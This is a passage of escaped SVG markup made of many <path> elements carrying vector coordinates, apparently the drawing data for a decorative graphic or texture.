d=\"M128,71.6c3.6-.2-3.4-.8.5-1-3.8,0-3.1-.3-5.9-.4C125.5,70.9,122.7,71.1,128,71.6Z\"></path>\n <path d=\"M146.2,70.3c-4.5-.1-2.4.4-5.2.4,3.4.1,1.8.5,4.7.7a11.09,11.09,0,0,1,2.7,0c-3.1-.6,1.1,0,2.4-.4C146.9,70.6,144,70.8,146.2,70.3Z\"></path>\n <path d=\"M431.6,77.4a4.41,4.41,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C430.2,77.2,428,77.6,431.6,77.4Z\"></path>\n <path d=\"M407.6,76.8c.4-.3,4.1-.4,3.5-.8C407.2,76,405.6,76.7,407.6,76.8Z\"></path>\n <path d=\"M315.5,74.8c.8-.4-3.7-.6-.7-.8C310.2,73.7,311.1,74.8,315.5,74.8Z\"></path>\n <path d=\"M229.6,72c1.7.1,4,.1,4.4.2s0,.3,1.7.4c1.7-.3-1.2-.6-3.6-1C231.6,71.7,227.7,71.6,229.6,72Z\"></path>\n <path d=\"M144.8,70.2c-2.6-.4,5.6-.3.8-.6-1.3.1-2.6.2-4,.2.2-.2-.7-.4-3.2-.5-.4.3,3.5.5.6.7A53.44,53.44,0,0,1,144.8,70.2Z\"></path>\n <path d=\"M421.4,75.2c-4.3-.1-5.3.1-8.2.1a10.34,10.34,0,0,0,3.3.6C416.9,75.6,422.5,75.7,421.4,75.2Z\"></path>\n <path d=\"M380.2,74c-.8.3-1.1,1,5.2,1.2C383.3,74.9,382.7,74.4,380.2,74Z\"></path>\n <path d=\"M372.6,75c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C370.8,74.9,369.7,74.7,372.6,75Z\"></path>\n <path d=\"M441.1,75.5a45.38,45.38,0,0,0,4.9.9C448.4,76.2,447.3,75.5,441.1,75.5Z\"></path>\n <path d=\"M152,69c-1.1.2-5.6,0-3.8.5,2.1,0,5.3.2,5.6,0-1.1-.1-2.8-.1-2.9-.2C150.6,69.2,156.8,69.2,152,69Z\"></path>\n <path d=\"M366.4,74.2c-1-.3,5.6-.5-2-.7C365.4,73.7,363.2,74.1,366.4,74.2Z\"></path>\n <path d=\"M126.5,68.3c.3.1,0,.3,1.7.4.2-.3,4.1-.2,5.3-.3C130.2,68.3,128,68.3,126.5,68.3Z\"></path>\n <path d=\"M405.8,74.7c2.5-.2,5-.1,2.3-.5C404.5,74.1,402.6,74.6,405.8,74.7Z\"></path>\n <path d=\"M154.1,68.3c-.2.2-5.2,0-5.4.2,5.2,0,2.6.5,7.4.5C155.2,68.8,157.3,68.4,154.1,68.3Z\"></path>\n <path d=\"M188.2,69.1c-7.4-.3-2.7.8.4.4C185,69.4,187.8,69.1,188.2,69.1Z\"></path>\n <path d=\"M450,74.5c1,.4,2.4.7,6.4.9A26.64,26.64,0,0,0,450,74.5Z\"></path>\n <path d=\"M142.7,67.8c.6.2,12.2.6,7.1.2,0,.1-.1.1-1.3.1-.3-.1,0-.3-1.7-.4C146.8,67.9,142.9,67.7,142.7,67.8Z\"></path>\n <path d=\"M184.6,68.1c-6.5,0-5.1.1-8.7-.4-.3.3-.2.4-3.7.6,4.4.2,5.8.1,10.1.4,1.5-.1,1.4-.2-.4-.4C183.6,68.3,185.2,68.3,184.6,68.1Z\"></path>\n <path d=\"M153.3,67.3c-4.5-.2-5.7,0-6.8.2,2.5,0,4.4.1,5.8.2C151.7,67.5,153.6,67.5,153.3,67.3Z\"></path>\n <path d=\"M287.9,70.2c-3-.2-5.8-.4-8.8-.5C278.3,70,286.9,70.4,287.9,70.2Z\"></path>\n <path d=\"M409.8,73c.8-.3,1.6-.6-2.1-.8C409.2,72.6,404.2,72.7,409.8,73Z\"></path>\n <path d=\"M47.3,63.6c-.3.3-3.9.2-3.7.6C46.9,64.2,51,63.9,47.3,63.6Z\"></path>\n <path d=\"M126.3,64.9a22.4,22.4,0,0,0,4.8.8c-.1-.1,2.4,0,2.7-.2C129.7,65.4,130.9,65,126.3,64.9Z\"></path>\n <path d=\"M45.5,63.1a23.75,23.75,0,0,1,2.8.1c-1-.4,3-.6-3.5-.8-.2.4,3.1.6-.8.6C44.8,63,45.6,63,45.5,63.1Z\"></path>\n <path d=\"M337.1,69.4c-2.2-.5,4.5-.2,5.2-.4C338.5,68.4,330.4,69.2,337.1,69.4Z\"></path>\n <path d=\"M267.4,65.9a10.66,10.66,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3C264.3,66.9,272.2,66.3,267.4,65.9Z\"></path>\n <path d=\"M49.3,61.1c-5-.2-1.1.5-5.2.4,2.2.2,6.4.2,6.1.6-3.8,0-3-.3-5.9-.4.8.6,7.8.6,10.1.3C50,61.9,49.2,61.6,49.3,61.1Z\"></path>\n <path d=\"M411.5,70.2c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C408.2,69.8,409.3,70,411.5,70.2Z\"></path>\n <path d=\"M127.1,62.8c-2,.1-8.6.3-3.6.7C121.5,63,131.3,63.1,127.1,62.8Z\"></path>\n <path d=\"M242.9,64.9c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C245.7,65.1,247.4,65.1,242.9,64.9Z\"></path>\n <path d=\"M254.7,65.6c2,.1,2.5.2,4.4.3-2.4-.5-.6-.7.4-1.1C255,64.9,253.7,65.1,254.7,65.6Z\"></path>\n <path d=\"M408.6,68.5c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C413.4,68.8,411.6,68.6,408.6,68.5Z\"></path>\n <path d=\"M312.4,66.5c.8-.4-2.8-.5-4.9-.8C304.3,66,309.5,66.3,312.4,66.5Z\"></path>\n <path d=\"M214.1,63.7a54.5,54.5,0,0,0-7,0c2.3.1,1.1.3,3.1.4.1-.1-.5-.3,1.1-.3C213.1,63.9,214.4,64,214.1,63.7Z\"></path>\n <path d=\"M345.5,66.3c-.6-.3-4.5.8.7.8C349.2,66.9,344.7,66.6,345.5,66.3Z\"></path>\n <path d=\"M255.4,64.9c2.3-.2-.1-1-3.4-.7C256.5,64.4,249,64.7,255.4,64.9Z\"></path>\n <path d=\"M365.6,66.9c-4,.1-13.3-.4-14-.1C353.2,66.8,366.6,67.6,365.6,66.9Z\"></path>\n <path d=\"M149.8,61.8c-.4.3,2.2.5,4.7.7C154.5,62.1,154.2,61.8,149.8,61.8Z\"></path>\n <path d=\"M106.4,61.3c-2.3-.4,5.9-.4.7-.7.3.2-.9.2-2.7,0C105.4,60.8,103.3,61.2,106.4,61.3Z\"></path>\n <path d=\"M335.9,66.4c4.3.2,5.7-.3,2.3-.5C337.8,66.1,335.4,66.1,335.9,66.4Z\"></path>\n <path d=\"M65.7,59.3c1.9.6-.8.7,3.7,1.1C69.3,60,68.7,59.6,65.7,59.3Z\"></path>\n <path d=\"M56.2,59.5c4.4.1,4.7.5,7.6.7C65.4,59.8,58.3,59.3,56.2,59.5Z\"></path>\n <path d=\"M59.6,57.1c-2.1,0-5.3-.2-5.6,0,6.7.2,3.9.9,8.1,1.3,1-.4,6.1.4,1.8.5,1.9,0,3.1.1,4.3.2,2.3-.1-1.6-.4-.7-.8C60.9,58.1,63.4,57.4,59.6,57.1Z\"></path>\n <path d=\"M38.7,57c2.2.5.4,1.2,6.8,1.5C39.5,57.8,46.5,57.5,38.7,57Z\"></path>\n <path d=\"M116.7,58.8c4.6.5,2.4,1,6.6,1.2-2.1-.5,1.9-.4,2.2-.7C120.5,59.3,121.1,58.9,116.7,58.8Z\"></path>\n <path d=\"M105.5,58.7c.1.4,5.3.5,7.6.7A53.68,53.68,0,0,0,105.5,58.7Z\"></path>\n <path d=\"M269.6,62c2.2.4-7,.5.7.8C268.8,62.5,274,62.3,269.6,62Z\"></path>\n <path d=\"M151.7,59.2a15.43,15.43,0,0,0,4.9.8C153.3,59.5,158.6,59.4,151.7,59.2Z\"></path>\n <path d=\"M332.9,62.9c.4.3,1.3.5,3.4.7,1.6-.2-.4-.2.9-.5C335.3,63.1,334,63,332.9,62.9Z\"></path>\n <path d=\"M253.4,61c2,0,3.2.1,4.4.2,0-.1.2-.3,2.6-.2a9.4,9.4,0,0,0-3.2-.5A19.4,19.4,0,0,1,253.4,61Z\"></path>\n <path d=\"M104.2,57.2a34.16,34.16,0,0,0-6.7.3C102.2,57.7,104.2,57.5,104.2,57.2Z\"></path>\n <path d=\"M33.6,54.3c3.4.5-.7,1,3.9,1.3C35.6,55,41.5,54.6,33.6,54.3Z\"></path>\n <path d=\"M140.1,57c7.7.1,4.9-.6.5-1C142,56.5,139.8,56.6,140.1,57Z\"></path>\n <path d=\"M344,61.3c1.8-.1,8.3-.4,2.1-.7,1.1.3-.2.4-4,.2C342.5,61,342,61.2,344,61.3Z\"></path>\n <path d=\"M88.8,53.9c2.3.5-2.1,1.3,2.6,1.4C89.3,54.7,94.7,54.3,88.8,53.9Z\"></path>\n <path d=\"M193.6,56.3a38.23,38.23,0,0,0,6.3.8C199.3,56.7,198.3,56.4,193.6,56.3Z\"></path>\n <path d=\"M95.7,53.9a9.77,9.77,0,0,0-3.5-.8C90.8,53.1,92.2,53.7,95.7,53.9Z\"></path>\n <path d=\"M343.9,58.2c-3.5-.1-6.8-.1-8.6-.3,1.9.3,6.3.5,9,.7C344.2,58.5,344.1,58.3,343.9,58.2Z\"></path>\n <path d=\"M200.4,54.5c-1.8.1-2,.7,2.1.8C199,54.9,204.1,54.8,200.4,54.5Z\"></path>\n <path d=\"M306.6,56.8c.2.3,1.2.6,3.5.8C309.6,57.3,310.7,56.9,306.6,56.8Z\"></path>\n <path d=\"M298.8,55.8c.9.5-4.5,0-7,0-.6.2-2.7.3-3.8.5,4.2-.2,14.1.2,16.5-.2C302.1,56,300.1,55.9,298.8,55.8Z\"></path>\n <path d=\"M204.6,53.1c-5,0-.6-.7-6.2-.7C198.2,52.7,202.3,53.3,204.6,53.1Z\"></path>\n <path d=\"M110.7,50.4a52.3,52.3,0,0,0-5.6,0c0,.3.2.5,3.3.6C107.5,50.6,110.1,50.6,110.7,50.4Z\"></path>\n <path d=\"M308,55.2c-1.5-.6-7.4-1.1-1-1.1-4.2-.3-11.5-.3-14.5-.7l.2.2c4.2.2,8,.5,10.4.8C297.7,54.4,304.6,55,308,55.2Z\"></path>\n <path d=\"M265.3,54.1c4.3.2,5.7-.3,2.3-.5C267.3,53.8,263.8,53.7,265.3,54.1Z\"></path>\n <path d=\"M29.6,48.2c.9.2-1.2.5,1.9.6C32.3,48.6,36.7,48.4,29.6,48.2Z\"></path>\n <path d=\"M333.9,54.7c-2.8.1-.5.9,3.6,1C337.4,55.1,338.3,55,333.9,54.7Z\"></path>\n <path d=\"M113.1,49.9c-.4.3,1.7.5,6,.6C120.5,50.1,115,50.1,113.1,49.9Z\"></path>\n <path d=\"M345.4,55c-1.9-.1-2.8-.2-5.8-.2.2.2.3.4.5.6C343.7,55.4,345.4,55.3,345.4,55Z\"></path>\n <path d=\"M134.1,50.2c3,.1.8.5,4.4.3.3.1,0,.3,1.7.4C144.3,50.7,135.5,50,134.1,50.2Z\"></path>\n <path d=\"M343.3,54.2c-4.7-.2-.8.3-5.5.1-.4-.2.2-.4-1.8-.5.2.2.3.4.5.6,2.1.1,3.7.2,5.9.4C340.9,54.4,344.1,54.5,343.3,54.2Z\"></path>\n <path d=\"M281.2,53.1c-2.1-.2-.1-.7-4.8-.8C276.7,52.7,276.8,53.1,281.2,53.1Z\"></path>\n <path d=\"M266.4,52.2c-2.5,0-4.4-.1-5.8-.2,1.8.2,4.6,1,7.6.7C266.1,52.6,266.7,52.3,266.4,52.2Z\"></path>\n <path d=\"M165.1,49.1c-.9,0-1.7,0-1.3.1,3.8.2.9.7.8.9,4.8,0,3.9-.4,6.4-.6-5.2-.1-3.4.1-3-.3C166.9,49.2,166,49.1,165.1,49.1Z\"></path>\n <path d=\"M356.2,53.1c-1.9-.1-2.8-.2-5.8-.2q0,.45,3.3.6C353.5,53.2,357.5,53.4,356.2,53.1Z\"></path>\n <path d=\"M280.7,51.1c-3.1,0-4.9.1-5.3.3,2,0,3.2.1,4.4.2C278.3,51.2,281.5,51.3,280.7,51.1Z\"></path>\n <path d=\"M304.1,50.8c-3.5,0-5.6.1-8.2.1,2.1.1,1.5.3,1.8.5,2,.2,5.3.2,7.3.4l-.4-.4a36.81,36.81,0,0,1-4.2-.1l-.2-.2C302.8,51.3,305.1,51.2,304.1,50.8Z\"></path>\n <path d=\"M352.3,51.9c-4.7-.1-5.3.2-6.5.5,2.6,0,3.2.2,5.8.2C350.5,52.2,349.2,52.1,352.3,51.9Z\"></path>\n <path d=\"M289.7,50.2c-4.5,0-2.3-.4-5.9-.5C282.9,50.1,288.5,50.6,289.7,50.2Z\"></path>\n <path d=\"M362.9,51.3c-4.3,0-4.3-.3-8.6-.3C354.5,51.3,363.5,51.6,362.9,51.3Z\"></path>\n <path d=\"M344.4,50.7c3.4-.3-.7-1.2,4.4-1.3,0-.3-2.5-.4-4.6-.5C347.9,49.5,339.4,50.2,344.4,50.7Z\"></path>\n <path d=\"M363.6,50.5c-4,.1-9.2.1-2.4.4.1.1.3.1,1.5.1C361.3,50.7,364.5,50.8,363.6,50.5Z\"></path>\n <path d=\"M356.6,48.8c.3.3-2.2.3-.8.6,3.5.1,6.9.2,6.9-.1-1.7-.1-4-.1-4.4-.2A4.48,4.48,0,0,0,356.6,48.8Z\"></path>\n <path d=\"M341.9,48c.8.2.9.5,4.6.5C349,48.4,345.8,48.1,341.9,48Z\"></path>\n <path d=\"M349.2,48.3c1.9,0,3.8.1,5.7.1-.2-.2-.3-.4-.5-.6C349.1,47.7,348.3,48,349.2,48.3Z\"></path>\n <path d=\"M38.1,40.6c-4.5-.1-7.1.3-2.3.5C34.4,40.7,39.5,40.9,38.1,40.6Z\"></path>\n <path d=\"M294.9,46.7c6.2.2,3.3-.4,3.5-.8C291.1,45.8,297.4,46.3,294.9,46.7Z\"></path>\n <path d=\"M354.2,47.7c1.4-.2,4.4-.3,5.1-.5C355.5,47.1,350.1,47.4,354.2,47.7Z\"></path>\n <path d=\"M259.6,44.5c5.7-.1,11.3.5,15.6.4-4.3-.2,1.2-.2-.4-.4-4.4-.1-8.4.2-11.3-.3C264.2,44.4,258.1,44.1,259.6,44.5Z\"></path>\n <path d=\"M376.3,46c-3.7,0,.8-.6-4.6-.5,1.9.4,1.2.4-2.3.5a32.29,32.29,0,0,0-4.5-.4c2.3.5,6.6.7,3.7,1.1,1.7.1,3.9.2,7.2.3,1.1-.4-5.5-.3-4.7-.7A34.73,34.73,0,0,0,376.3,46Z\"></path>\n <path d=\"M299.8,44.3c-1.1.1-3.1.7,2,.7C298.8,44.6,303.5,44.6,299.8,44.3Z\"></path>\n <path d=\"M278.3,43.6c6.4,0,4.8.5,8.9.6-.9-.7,4.9-1-1.3-1.4.6.4-2.1.4-.6.9C283.3,43.6,277.9,43.3,278.3,43.6Z\"></path>\n <path d=\"M337.4,44.4c-1.1.1-3.1.9,2.2.9C335.9,44.9,341.5,44.7,337.4,44.4Z\"></path>\n <path d=\"M240.3,43.1c6.1.2,6.3-.2,8-.4C242.3,42.5,242,42.8,240.3,43.1Z\"></path>\n <path d=\"M4.7,37.3c-.1-.3-.5-.7-3.5-.8C-.4,36.6.4,37.2,4.7,37.3Z\"></path>\n <path d=\"M330.9,41.8c-3.8-.2-6.4.5-.9.5C328.6,42,331.8,42.1,330.9,41.8Z\"></path>\n <path d=\"M324.5,40.8c5.4.7-5.9.3-7.8.6,6.7.1,11.6.1,16.7,0C328.9,41.3,328.8,40.9,324.5,40.8Z\"></path>\n <path d=\"M0,33.6H0V34a24.24,24.24,0,0,0,3.4.2C3.3,34,2.2,33.7,0,33.6Z\"></path>\n <path d=\"M7.9,31.5c-3-.2-4.9,0-7.3-.4-1.6.4,0,.8,4.6.5.6.8-4,1.8,3.7,2.6-.5-.2,1.4-.2,1-.4-2.9-.1-5.6-1.3.3-1.3C10.6,32.1,4.7,31.7,7.9,31.5Z\"></path>\n <path d=\"M281.8,39.6c.2.2-3.9,0-4,.1,3.8,0,3,.3,5.9.4C285.3,40,285.1,39.7,281.8,39.6Z\"></path>\n <path d=\"M310.4,40.6c.4-.3-1.7-.5-6.1-.6C304.8,40.3,306.8,40.5,310.4,40.6Z\"></path>\n <path d=\"M302.2,39.1c-4.7-.2-.8.3-5.5.1,1.5.2.5.6,4.7.7C303.3,39.7,302.4,39.4,302.2,39.1Z\"></path>\n <path d=\"M297.4,38.4c-8.1-.3-1.5.7,1.7.4C297.5,38.8,297.4,38.6,297.4,38.4Z\"></path>\n <path d=\"M335,38.5c-1.1.1-.9.6,3.4.7A9.43,9.43,0,0,0,335,38.5Z\"></path>\n <path d=\"M360.1,38.7a25.51,25.51,0,0,1-4.1,0c3.9.5-1.2.7-5.3.3-1.4.3,9.8.5,10,.3C355.6,39.1,365.3,38.9,360.1,38.7Z\"></path>\n <path d=\"M304.7,37.3c.3.4,4,.5,6.3.8,1.6-.1,7.1-.4.7-.7C312.9,38,307.5,37.4,304.7,37.3Z\"></path>\n <path d=\"M344,37.6c.1.3,4.2.4,6.1.6-.2-.2.5-.2,1.1-.3C347.2,37.9,347.3,37.7,344,37.6Z\"></path>\n <path d=\"M347.9,35.8c1.5.2.5.6,4.8.7C352.6,36.1,352.2,35.8,347.9,35.8Z\"></path>\n <path d=\"M291.2,34.6c.3-.4,3.8-.7-1.9-.6C293,34.2,284.7,34.4,291.2,34.6Z\"></path>\n <path d=\"M280.1,33c1.1.7,9,.2,11.1,0C286.2,32.7,286.4,33.5,280.1,33Z\"></path>\n <path d=\"M347.2,33.5c-4.3-.1-2.6.3-3.8.5C347.9,34.1,347.8,33.8,347.2,33.5Z\"></path>\n <path d=\"M331.3,32.8c-.1.1-.2.3-2.6.2-.2.3,2.3.4,6,.5A8.62,8.62,0,0,0,331.3,32.8Z\"></path>\n <path d=\"M338,30.8c-2.1.5-2.6.5-7.8.6,3,.3,6.6,0,10,.3C335.4,31.3,345,31.2,338,30.8Z\"></path>\n <path d=\"M117,114.4c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A20.13,20.13,0,0,1,117,114.4Z\"></path>\n <path d=\"M312.3,113.8c5.3.2,13.1.2,9.6-.1C321.3,114.2,312.6,113.3,312.3,113.8Z\"></path>\n <path d=\"M227.3,108.8c-.7.6,1.8.9-1.8,1.2,2.8.1,2.1.3,5.9.4C227.6,109.9,235.6,109,227.3,108.8Z\"></path>\n <path d=\"M345.3,108.6c-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.18,17.18,0,0,1,5.2-.4,2.23,2.23,0,0,0,1.4,0c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6C346,108.2,348,108.6,345.3,108.6Z\"></path>\n <path d=\"M407.8,111.8c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C406.2,112,412.1,111.9,407.8,111.8Z\"></path>\n <path d=\"M367.7,108.8c-5-.1,2.7-.3-1.7-.4-9.8.5-1.9,1.9-5.1,2.1,2.8,0,6.2.6,8.6.3C360.7,110.3,364.3,109,367.7,108.8Z\"></path>\n <path d=\"M542.5,111.7c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C550.3,112.4,545.3,112,542.5,111.7Z\"></path>\n <path d=\"M372.5,107.9c-9.1-.3-.3.9,1.9.6C371.3,108.4,373.4,108.1,372.5,107.9Z\"></path>\n <path d=\"M347.2,104.4c3.2,1,2.4,1.5-5.3,1.8,3.6.1,5.6.3,6.1.6a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8C348.6,104.7,348.6,104.2,347.2,104.4Z\"></path>\n <path d=\"M263.7,36.5c6.8.2,2.1.2,1.8.5,3.1,0,4.6.2,4.5.4a15.72,15.72,0,0,0-3.8.5c4.9,0,5.8-.3,9.3-.4a49.56,49.56,0,0,1-7.4-.5c.2-.3,4.2-.2,5.3-.3-3.7-.1-6.1-.2-6-.5C265.6,36.2,263.2,36.2,263.7,36.5Z\"></path>\n <path d=\"M369.4,60.3c-1-.3-2.2-.4.9-.5-1.3-.2-4.7-.3-7.3-.4C362,59.8,367.2,60,369.4,60.3Z\"></path>\n <path d=\"M174.1,64.2c4.8.3.4,1.2,8.4,1.6-2.3.2-4.3-.2-7,0,8.7.6,2.6,1.2,8.8,2.1-3.6-1,5.3-2-4.1-3a14.92,14.92,0,0,0,2.2-.5C181,64.4,175.8,63.9,174.1,64.2Z\"></path>\n <path d=\"M164.2,48.1c.2-.1.3-.1.4-.2C164,47.9,163.7,48,164.2,48.1Z\"></path>\n <path d=\"M329.2,36.7c-4,.6-9,.4-17.6.5,3.3.4,5.3.1,7.2.3-3.7.1,2.7.5,3.4.7-1.2.8-4.4,1.3.4,2.1-2.5,0-5-.4-5.7-.1,5,0,1.6.5,6.1.6-2.3-.6-.8-.1,4.1,0-1-.3-2.6-.6-3.6-1,1.5-.1,5.2-.1,6.8-.2-4.3-.2,3.1-.1,1-.4-4.1-.2-3.6.1-7,0-.1-.1-1.3-.2-1.6-.3,3.3,0,6.5,0,6.7-.3a36.81,36.81,0,0,1-4.2-.1c2.6,0-3.8-1,3.8-.5.1-.2-1.9-.6,2.5-.4C327.4,37.2,336.5,37,329.2,36.7Z\"></path>\n <path d=\"M403.3,73.5c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A72.1,72.1,0,0,1,403.3,73.5Z\"></path>\n <path d=\"M361.2,99.8c-4.4-.2-3,.7-2.3.6C360,100.2,362.6,100.2,361.2,99.8Z\"></path>\n <path d=\"M310.5,99.1l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C305.8,98.5,308.6,99.1,310.5,99.1Z\"></path>\n <path d=\"M502.5,102.5c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C500.4,102.5,501.4,102.5,502.5,102.5Z\"></path>\n <path d=\"M360.4,95.7c6.3.3,2.6-.4,8.2-.1,3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-2.4.1-1.2.9-6.6.4C363.6,95.5,358.5,95.3,360.4,95.7Z\"></path>\n <path d=\"M120.1,89.5c.8-.1,2.8-.1,5.5-.1a29.61,29.61,0,0,0-4.7-.7C125.3,89.1,116,89.5,120.1,89.5Z\"></path>\n <path d=\"M382.1,92c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4h-4.1c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.2.5.7,1.2-7.4,1,7.1.2-.9.4-.9.5,8.4.3,1.9,1,5.6,1.7-6-.1-2.8.2-.7.7-7-.3-4.2.3-8,.4,14.9,1,2.7,2-.3,2.3,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8,2.2.1,4.6.3,4.6.5a13.78,13.78,0,0,1-4.7.4c1.2.1-1.7.7,1.3.5,9.1-1,8.4,2.6-2.4,2,1.1.3,6.1.4,6.3.8-3.4.1-3,.6-7.8.6.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0c1.7.3,4.8.7.7.8a27.48,27.48,0,0,0-7.3-.4c3.7.3.7,1.2-.3,1.2,1.5.4,4.5,0,7.1.2.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-2.5-.2-3.5-.6-6.3-.8,3.1.5-2.2.5.9,1,3.4.2,5.1-.2,5.7.1-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C374.7,92.8,373.4,91.8,382.1,92Z\"></path>\n <path d=\"M359.9,82.1h-.3a.19.19,0,0,0,.27,0h0Z\"></path>\n <path d=\"M492,95.4c2.4,0,3.8.2,4.3.1-3.2-.1-.3-.6-4.7-.7C491.7,95.1,491.9,95.2,492,95.4Z\"></path>\n <path d=\"M204.4,85.9a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3-3.6-.2-3.2.5-.7.7-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2C200.6,86.3,209,86.3,204.4,85.9Z\"></path>\n <path d=\"M392.2,89.3c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C401.2,90.9,390.6,89.7,392.2,89.3Z\"></path>\n <path d=\"M327.2,89.6c1.9,0,3.8.1,5.7.1C334.1,88.7,332.4,89.5,327.2,89.6Z\"></path>\n <path d=\"M408.2,90.1c-1.8,0-7.3,1.1-1.9,1C403.4,90.8,409,90.5,408.2,90.1Z\"></path>\n <path d=\"M442.5,89.7c.4.5-8.9,2.1,1.6,1.8C445.8,90.9,447.1,90.6,442.5,89.7Z\"></path>\n <path d=\"M213.8,83.9c-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4-2.1-.3-6.9-.1-7.2-.3,7.5-.3-3.4-1.6,5-2.2-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1,1.1-.4,4.7-.7,10.9-.3-6.1-.6,2.2-.5-.8-.9-2,.5-4.2-.4-8.8-.5-.5.6-1.6.7,2.4,1.1-9.9.9-2,2.7-5,3.8-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4,1.4.6-4.4.3-6.6.4a123.68,123.68,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2C211,85.4,220.4,84.6,213.8,83.9Z\"></path>\n <path d=\"M438.3,89.6c-.4-.4-5.4-.5-7.7-.8C426.5,88.3,433.2,89.6,438.3,89.6Z\"></path>\n <path d=\"M307.7,86.4c1.9,0,5.6.5,5.8.2-5-.5-.6-.9,3-1.4-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8C308.2,85.2,310.1,85.7,307.7,86.4Z\"></path>\n <path d=\"M175.7,80.1c-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3,7.9.4-1.4,1.1,4.1,1.5C171.9,80.7,172.1,80.3,175.7,80.1Z\"></path>\n <path d=\"M178.7,80.4c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C181.7,80.9,182.8,80.5,178.7,80.4Z\"></path>\n <path d=\"M322.1,83.9c.5-.3,2.4.2,4.4.2,1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2C321.9,83.3,316.9,83.6,322.1,83.9Z\"></path>\n <path 